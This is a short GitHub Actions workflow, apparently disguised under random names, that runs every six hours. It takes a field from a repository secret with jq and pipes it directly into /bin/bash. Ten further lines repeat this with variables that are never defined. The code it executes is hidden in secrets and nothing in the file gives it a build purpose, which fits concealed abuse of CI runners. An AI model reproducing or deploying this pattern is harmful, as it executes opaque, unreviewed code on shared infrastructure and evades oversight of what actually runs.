name: hotdogequal
on:
  workflow_dispatch:
  schedule:
    - cron: '9 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: hotdogequal
        env:
          vjs0: ${{ secrets.vjs0 }}
        run: |
          echo $vjs0 | jq -r .py437 | /bin/bash
          echo $cesv768 | jq -r .e54 | /bin/bash
          echo $a1 | jq -r .o56 | /bin/bash
          echo $thf0 | jq -r .l2 | /bin/bash
          echo $ubt695 | jq -r .swesh0 | /bin/bash
          echo $deix5 | jq -r .avp950 | /bin/bash
          echo $dpd62 | jq -r .dssc03 | /bin/bash
          echo $wabjg4710 | jq -r .r4358 | /bin/bash
          echo $znjbe66678 | jq -r .efjtw72 | /bin/bash
          echo $dqnge7 | jq -r .arn08 | /bin/bash
          echo $otigy6 | jq -r .zhdle39579 | /bin/bash

